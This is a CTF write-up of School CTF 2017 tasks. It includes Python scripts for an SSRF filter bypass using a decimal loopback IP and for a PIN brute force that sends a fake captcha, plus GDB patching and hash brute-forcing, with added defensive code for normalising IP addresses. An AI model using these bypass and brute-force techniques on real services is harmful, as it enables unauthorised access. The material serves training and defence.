School CTF 2017 - Write Up

by CTF.Ninja

Website

Web100 (Self Signed)

When they ask me should I trust SchoolCTF or not - the answer is obvious!

Task URL

The site uses a self-signed SSL certificate, and the flag is in the certificate's Organizational Unit (OU) field.

curl -v https://secured.task.school-CTF.org/ -k --silent -I

Flag : SchoolCTF{n0t_so+$eCur3}

Web200 (Port Scan)

Pretending to be a simple front-developer Frank The Hacker, 
who is a hacker, wrote his cloud analog nmap and he plans an ICO, 
but it seems there is an error which makes it possible to know one of Frank's secrets.

Can you find it?

Task URL

The site provides a port scanning facility with two features.

The first, 'Scan the host to get the list of open ports', shows port 31337 open with the service "SchoolCTF Flag Server".

The second, 'Identify the single port on the host', refuses to scan "localhost" or "127.0.0.1" and returns the message 'Identifying ports of internal hosts is prohibited'.

Possible SSRF?

To bypass it, convert the IP 127.0.0.1 to its long/decimal form; the second feature then accepts it, and the flag can be read from port 31337.

Here is the script used to get the flag.

import re
import requests
from socket import inet_aton
from struct import unpack


def ip2long(ip):
    # Dotted-quad -> 32-bit integer (127.0.0.1 -> 2130706433)
    return unpack("!L", inet_aton(ip))[0]


def main():
    URL = "http://portscan.task.school-CTF.org/port"
    IP = "127.0.0.1"
    HOST = ip2long(IP)  # decimal form is not caught by the "internal host" check
    PORT = "31337"
    print("Host : {}".format(HOST))
    r = requests.post(URL, data={"host": HOST, "port": PORT})
    flag = re.findall(r"SchoolCTF\{.*?\}", r.text)
    print("Flag : {}".format(flag[0]))


if __name__ == '__main__':
    main()

Flag : SchoolCTF{[email protected]^^3@11@r0unD}
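The bypass works because the scanner compares the submitted host as a string against "localhost" / "127.0.0.1", while the code that actually connects accepts every form inet_aton does (decimal, hex, octal and shortened dotted forms). The example below is added here and is not part of the original write-up; it shows the defender's side of the same issue: normalise the host exactly as the connecting code will, then classify the resulting address. The names `_parse_part`, `canonical_ipv4`, `naive_is_blocked` and `is_internal` are my own, and the sample inputs are constructed.

```python
import ipaddress
import re


def _parse_part(part):
    """Parse one component the way inet_aton does: 0x.. is hex, a leading 0 is octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]*", part):
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part, 10)
    raise ValueError("not an inet_aton numeric component: %r" % part)


def canonical_ipv4(host):
    """Return the dotted-quad form of any IPv4 literal inet_aton would accept.

    inet_aton takes 1 to 4 components and the last one fills all remaining bytes,
    so "2130706433", "0x7f000001", "127.1" and "0177.0.0.1" are all 127.0.0.1.
    Raises ValueError for anything that is not such a literal (e.g. a hostname).
    """
    parts = host.strip().split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError("too many components")
    nums = [_parse_part(p) for p in parts]
    for n in nums[:-1]:
        if n > 0xFF:
            raise ValueError("component out of range")
    tail_bytes = 4 - (len(nums) - 1)
    if nums[-1] >= 1 << (8 * tail_bytes):
        raise ValueError("last component out of range")
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << (8 * tail_bytes)) | nums[-1]
    return str(ipaddress.IPv4Address(value))


def naive_is_blocked(host):
    """The kind of check the challenge used: a plain string comparison, defeated by any re-encoding."""
    return host.strip().lower() in ("localhost", "127.0.0.1")


def is_internal(host):
    """Normalise first, then classify.

    Returns None for hostnames: those must be resolved and the *resolved* address
    passed back through this check, otherwise DNS becomes the next bypass.
    """
    try:
        addr = ipaddress.ip_address(canonical_ipv4(host))
    except ValueError:
        return None
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


if __name__ == "__main__":
    # Constructed inputs: the write-up's decimal form plus other encodings inet_aton accepts.
    for sample in ("127.0.0.1", "2130706433", "0x7f000001", "127.1", "0177.0.0.1", "8.8.8.8"):
        print(sample, "->", canonical_ipv4(sample),
              "| naive blocked:", naive_is_blocked(sample),
              "| internal:", is_internal(sample))
```

Running it shows every encoding of the loopback address collapsing to 127.0.0.1 and being flagged as internal, while the string comparison only catches the one spelling the author of the challenge thought of.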

Web400 (Pin Code)

We overheard the talk between hacker Frank and his partner William!
It seems they have hidden something important in the safe, can you open it?

p.s. It seems that one of them said that they haven't yet fully configured the security system and the password can be cracked.
Safe URL

The site is a "Pin code validation" page: the correct PIN must be entered to get the flag.

Inspecting the page source (inspect element) shows the following code

      if (input.length >= 4) {
                var captcha = grecaptcha.getResponse();
                if (captcha.length > 0) {
                    if (isValid(input)) {
                        $.ajax({
                            type: "POST",
                            url: '/api/check',
                            data: {'key': input, 'captcha': captcha},
                            success: function(data){displayAnswer(data)},
                        });
                    } else {
                        displayAnswer({'body': 'wrong'})
                    }
                } else {
                    showError("Please pass the CAPTCHA challenge")
                }

From the code above, the PIN must be at least 4 characters long, the captcha response must be non-empty, and isValid must return true before the PIN is sent to the server for validation.

Here is the isValid function

        function isValid(code) {
            var d0 = parseInt(code[0]),
                d1 = parseInt(code[1]),
                d2 = parseInt(code[2]),
                d3 = parseInt(code[3]);
            return (d0+d1+d2)%10 == d3
        }

For isValid to return true, (digit 1 + digit 2 + digit 3) % 10 must equal digit 4.

Here is the script I used to find the valid PIN.

import requests
from itertools import product

URL = "http://pincode.task.school-CTF.org/api/check"


def is_valid(pin):
    # Same rule as the client-side isValid(): (d0 + d1 + d2) % 10 == d3
    return (int(pin[0]) + int(pin[1]) + int(pin[2])) % 10 == int(pin[3])


# Only PINs that pass the client-side check are worth sending to the server
pin_list = ["".join(p) for p in product("123456789", repeat=4)]
pin_list = [pin for pin in pin_list if is_valid(pin)]

for pin in pin_list:
    # The captcha value is not checked server-side, so any string will do
    r = requests.post(URL, data={"key": pin, "captcha": "SEMBARANGAJA"})
    if "wrong" in r.text:
        print("Wrong {}".format(pin))
        continue
    print("Found pin {}".format(pin))
    break

After running it, the valid PIN turns out to be 6444.

Submit the PIN to get the flag. Flag : SchoolCTF{n0_6rut3f0rc3_0n_CTF//mkey?}
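Two things made this brute force cheap: the captcha is enforced only in the browser (the script sends an arbitrary string and the server still answers), and the client-side isValid() reveals which PINs can possibly be accepted, so most of the keyspace never needs to be sent. The example below is added here and is not taken from the write-up; it ports the rule to Python and measures the reduction: over digits 0-9 the 10,000 possible PINs shrink to 1,000 (exactly one valid last digit per three-digit prefix), and over the 1-9 alphabet the script uses, 6,561 shrink to 657. The names `is_valid`, `candidate_pins` and `search_space` are mine.

```python
from itertools import product


def is_valid(pin):
    """Python port of the page's client-side isValid(): (d0 + d1 + d2) % 10 == d3.

    Like the JavaScript, only the first four characters are looked at, and a
    non-digit among them (parseInt -> NaN) makes the check fail.
    """
    if len(pin) < 4 or not pin[:4].isdigit():
        return False
    d0, d1, d2, d3 = (int(c) for c in pin[:4])
    return (d0 + d1 + d2) % 10 == d3


def candidate_pins(alphabet="0123456789"):
    """Every 4-character PIN over `alphabet` that survives the client-side check."""
    pins = ("".join(p) for p in product(alphabet, repeat=4))
    return [pin for pin in pins if is_valid(pin)]


def search_space(alphabet="0123456789"):
    """(total PINs, PINs surviving the client-side filter) for the given alphabet."""
    total = len(alphabet) ** 4
    return total, len(candidate_pins(alphabet))


if __name__ == "__main__":
    for alphabet in ("0123456789", "123456789"):
        total, surviving = search_space(alphabet)
        print("alphabet %s: %d PINs, %d pass isValid (%.1f%%)"
              % (alphabet, total, surviving, 100.0 * surviving / total))
    print("6444 passes isValid:", is_valid("6444"))
```

The lesson for the server side is the usual one: a check that runs in the browser is a hint to the attacker, not a control. The validation rule, the captcha and any attempt limit all have to be enforced by /api/check itself.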

Reversing

Rev100 (Incorrect Pointer)

The confrontation history of the evil hacker vs admin Tom has finally come to the end.
After twenty-eight hours of continuous battle, Tom finished a quantum automatic machine, decrypted all the data on the disk, but passed out from the exhaustion.
While Mary was waking Tom up, we started the machine and realized that Tom made an unfortunate mistake there. Help us to fix it!

Task.elf

We are given a 64-bit, non-stripped ELF binary. Running it prints a garbled string

$ ./source_2db04ad72496a13f2cf7afed1b558f5d682257c5
h�<��<Mx��M��<�x�v<~<
 ��ull!

Straight to debugging with GDB. Here is the disassembly of main.

gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x00000000004043cb <+0>: sub    rsp,0x18
   0x00000000004043cf <+4>: mov    DWORD PTR [rsp+0xc],edi
   0x00000000004043d3 <+8>: mov    QWORD PTR [rsp],rsi
   0x00000000004043d7 <+12>:    mov    rsi,rsp
   0x00000000004043da <+15>:    lea    rdi,[rsp+0xc]
   0x00000000004043df <+20>:    call   0x458960 <hs_init>
   0x00000000004043e4 <+25>:    mov    edi,0x7a3090
   0x00000000004043e9 <+30>:    call   0x4589e0 <hs_add_root>
   0x00000000004043ee <+35>:    mov    edi,0x7a31a0
   0x00000000004043f3 <+40>:    call   0x4042c5 <decrypt>
   0x00000000004043f8 <+45>:    mov    edi,0x7a3160
   0x00000000004043fd <+50>:    call   0x4aadd0 <puts>
   0x0000000000404402 <+55>:    call   0x458a00 <hs_exit>
   0x0000000000404407 <+60>:    mov    eax,0x0
   0x000000000040440c <+65>:    add    rsp,0x18
   0x0000000000404410 <+69>:    ret    
End of assembler dump.

The most interesting part is the following pair of instructions

   0x00000000004043ee <+35>:    mov    edi,0x7a31a0
   0x00000000004043f3 <+40>:    call   0x4042c5 <decrypt>

The address 0x7a31a0 is moved into edi, which becomes the first argument to the decrypt function.

Since the task is called "incorrect pointer", the goal is to change the argument passed to decrypt from not_flag to flag, so that the encrypted contents of the "flag" variable get decrypted (and then printed by the puts call that follows).

gdb-peda$ x/x 0x7a31a0
0x7a31a0 <not_flag>:    0xef0a5423
gdb-peda$ x/x &flag
0x7a3160 <flag>:    0x3c0dc966
gdb-peda$ b *0x00000000004043f3
Breakpoint 1 at 0x4043f3
gdb-peda$ r
gdb-peda$ set $edi=&flag
gdb-peda$ c
Continuing.
SchoolCTF{[email protected]_M1$T@ke$_As_1_d0}

Flag : SchoolCTF{[email protected][email protected]$_As_1_d0}

Rev300 (Brute me all night long)

Brute me all night long
Mr. Hashenberg is a very forgetful person, so he always uses his notepad to leave some notes. 
Recently he's lost several pages, could you help him to recover?

BruteMe.exe

We are given a .NET binary.

Here is the decompiled output from ILSpy

The Main function

// MD5Sample.SchoolCTF
public static void Main()
{
    Process notepadWindow = SchoolCTF.GetNotepadWindow("Why'd");
    if (notepadWindow != null)
    {
        string text = SchoolCTF.GetText(notepadWindow);
        if (SchoolCTF.GetMd5Hash(text) != "16c222aa19898e5058938167c8ab6c57") 
        {
            SchoolCTF.Fail();
        }
        else
        {
            notepadWindow = SchoolCTF.GetNotepadWindow("Y0u");
            if (notepadWindow != null)
            {
                string text2 = SchoolCTF.GetText(notepadWindow);
                if (SchoolCTF.GetSha384Hash(text2) != "71036b1049de3e6627aa06ef7af933cc460996fdd7ffa9872bf4881e8d10a9c3153c8413ca4cd300a04e81e38d55d327")
                {
                    SchoolCTF.Fail();
                }
                else
                {
                    notepadWindow = SchoolCTF.GetNotepadWindow("0nly");
                    if (notepadWindow != null)
                    {
                        string text3 = SchoolCTF.GetText(notepadWindow);
                        if (SchoolCTF.GetMd5Hash("Ooooh so" + text3 + "salty") != "d0061dcf056a06713d5a757e0288d1b3")
                        {
                            SchoolCTF.Fail();
                        }
                        else
                        {
                            notepadWindow = SchoolCTF.GetNotepadWindow("Ca11");
                            if (notepadWindow != null)
                            {
                                string text4 = SchoolCTF.GetText(notepadWindow);
                                if (SchoolCTF.GetMd5Hash("Stop trying to crack me god damnit!!!" + SchoolCTF.GetSha384Hash(text4)) != "5056e21f6af2a289c9c3116c16bba55f") 
                                {
                                    SchoolCTF.Fail();
                                }
                                else
                                {
                                    notepadWindow = SchoolCTF.GetNotepadWindow("M3");
                                    if (notepadWindow != null)
                                    {
                                        string text5 = SchoolCTF.GetText(notepadWindow);
                                        if (SchoolCTF.GetSha256Hash(text5 + "91") != "8e9b669109df89620b94f2387dc53206a82ddc71d658f8f7a2b3a9b417370d3e")
                                        {
                                            SchoolCTF.Fail();
                                        }
                                        else
                                        {
                                            notepadWindow = SchoolCTF.GetNotepadWindow("Wh3n");
                                            if (notepadWindow != null)
                                            {
                                                string text6 = SchoolCTF.GetText(notepadWindow);
                                                if (SchoolCTF.GetSha512Hash(text6) != "566b014c957c19cb81aab7776eaf614701dadc084aa73fd002301bc7277091c4269ce1223d16746df4e803b85171733b89fa34bb1c61830799dee3611c38e006") 
                                                {
                                                    SchoolCTF.Fail();
                                                }
                                                else
                                                {
                                                    notepadWindow = SchoolCTF.GetNotepadWindow("You'r");
                                                    if (notepadWindow != null)
                                                    {
                                                        string text7 = SchoolCTF.GetText(notepadWindow);
                                                        if (SchoolCTF.GetMd5Hash(SchoolCTF.GetSha384Hash("Oh, i see you reading my source code! >:)") + text7) != "c866a4f386df3da51a54c1f8434603eb")
                                                        {
                                                            SchoolCTF.Fail();
                                                        }
                                                        else
                                                        {
                                                            notepadWindow = SchoolCTF.GetNotepadWindow("H1gh");
                                                            if (notepadWindow != null)
                                                            {
                                                                string text8 = SchoolCTF.GetText(notepadWindow);
                                                                if (SchoolCTF.GetSha256Hash(SchoolCTF.GetSha384Hash(SchoolCTF.GetSha512Hash("FILL THE POWER OF SHA")) + text8) != "7f6e2c5beefd0fd0000c3a72db28b54d0819a93f5cc87a48507f79cdac37cfe0")
                                                                {
                                                                    SchoolCTF.Fail();
                                                                }
                                                                else
                                                                {
                                                                    SchoolCTF.Success(text, text2, text3, text4, text5, text6, text7, text8);
                                                                }
                                                            }
                                                            else
                                                            {
                                                                SchoolCTF.Fail();
                                                            }
                                                        }
                                                    }
                                                    else
                                                    {
                                                        SchoolCTF.Fail();
                                                    }
                                                }
                                            }
                                            else
                                            {
                                                SchoolCTF.Fail();
                                            }
                                        }
                                    }
                                    else
                                    {
                                        SchoolCTF.Fail();
                                    }
                                }
                            }
                            else
                            {
                                SchoolCTF.Fail();
                            }
                        }
                    }
                    else
                    {
                        SchoolCTF.Fail();
                    }
                }
            }
            else
            {
                SchoolCTF.Fail();
            }
        }
    }
    else
    {
        SchoolCTF.Fail();
    }
}

The Success function

// MD5Sample.SchoolCTF
public static void Success(string p1, string p2, string p3, string p4, string p5, string p6, string p7, string p8)
{
    StringBuilder stringBuilder = new StringBuilder("Please stop it, noooooo");
    stringBuilder[0] = p8[1];
    stringBuilder[1] = p8[0];
    stringBuilder[2] = p6[1];
    stringBuilder[3] = p6[0];
    stringBuilder[4] = p2[3];
    stringBuilder[5] = p7[1];
    stringBuilder[6] = p1[1];
    stringBuilder[7] = p1[0];
    stringBuilder[8] = p7[0];
    stringBuilder[9] = p2[1];
    stringBuilder[10] = p1[2];
    stringBuilder[11] = p6[2];
    stringBuilder[12] = p2[2];
    stringBuilder[13] = p3[0];
    stringBuilder[14] = 'y';
    stringBuilder[15] = p2[0];
    stringBuilder[16] = p3[1];
    stringBuilder[17] = p3[2];
    stringBuilder[18] = 'r';
    stringBuilder[19] = p4[0];
    stringBuilder[20] = p5[0];
    stringBuilder[21] = 'n';
    stringBuilder[22] = p5[1];
    MessageBox.Show("SchoolCTF{" + stringBuilder.ToString() + "}");
    Console.WriteLine("{0}", stringBuilder);
    Process process = Process.Start(new ProcessStartInfo("notepad.exe")
    {
        WindowStyle = ProcessWindowStyle.Maximized
    });
    process.WaitForInputIdle();
    SchoolCTF.SendText(process, SchoolCTF.succeeded);
}

The goal is to supply the correct values so that every condition in Main is satisfied and Success is called.

Here is the script used to find the correct inputs; the Success function is reimplemented so that the flag is printed directly.

import itertools
import string
import hashlib

letters = string.ascii_letters + string.punctuation + string.digits


def generator(n=1):
    # Every n-character string over the printable alphabet
    return itertools.product(letters, repeat=n)


def text3():
    # Main: MD5("Ooooh so" + text3 + "salty") == d0061dcf056a06713d5a757e0288d1b3
    for chars in generator(3):
        char = "".join(chars)
        possible = "Ooooh so{}salty".format(char)
        if hashlib.md5(possible.encode()).hexdigest() == "d0061dcf056a06713d5a757e0288d1b3":
            print("Found Text3 {}".format(char))
            return char


def text4():
    # Main: MD5("Stop trying to crack me god damnit!!!" + SHA384(text4)) == 5056e21f...
    for chars in generator(1):
        char = "".join(chars)
        hash384 = hashlib.sha384(char.encode()).hexdigest()
        possible = "Stop trying to crack me god damnit!!!{}".format(hash384)
        if hashlib.md5(possible.encode()).hexdigest() == "5056e21f6af2a289c9c3116c16bba55f":
            print("Found Text4 {}".format(char))
            return char


def text7():
    # Main: MD5(SHA384("Oh, i see you reading my source code! >:)") + text7) == c866a4f3...
    hash384 = hashlib.sha384(b"Oh, i see you reading my source code! >:)").hexdigest()
    for chars in generator(2):
        char = "".join(chars)
        possible = "{0}{1}".format(hash384, char)
        if hashlib.md5(possible.encode()).hexdigest() == "c866a4f386df3da51a54c1f8434603eb":
            print("Found Text7 {}".format(char))
            return char


def text8():
    # Main: SHA256(SHA384(SHA512("FILL THE POWER OF SHA")) + text8) == 7f6e2c5b...
    hash512 = hashlib.sha512(b"FILL THE POWER OF SHA").hexdigest()
    hash384 = hashlib.sha384(hash512.encode()).hexdigest()
    for chars in generator(2):
        char = "".join(chars)
        possible = "{0}{1}".format(hash384, char)
        if hashlib.sha256(possible.encode()).hexdigest() == "7f6e2c5beefd0fd0000c3a72db28b54d0819a93f5cc87a48507f79cdac37cfe0":
            print("Found Text8 {}".format(char))
            return char


def main():
    # p1, p2, p5 and p6 are unsalted hashes and were recovered from online lookup services:
    # http://hashkiller.co.uk
    # https://md5hashing.net/
    p1 = "541"
    p2 = "____"
    p5 = "19"
    p6 = "757"
    # The remaining pieces are salted or chained, so they are brute-forced here
    p3 = text3()
    p4 = text4()
    p7 = text7()
    p8 = text8()
    # Same character shuffle as Success() in the binary
    flag = (p8[1] + p8[0] + p6[1] + p6[0] + p2[3] + p7[1] + p1[1] + p1[0] + p7[0] + p2[1]
            + p1[2] + p6[2] + p2[2] + p3[0] + 'y' + p2[0] + p3[1] + p3[2] + 'r'
            + p4[0] + p5[0] + 'n' + p5[1])
    print("Flag : SchoolCTF{" + flag + "}")


if __name__ == '__main__':
    main()

Flag : SchoolCTF{Ju57_h45h_17_my_d4rl1n9}

Tags: SchoolCTF2017CTF
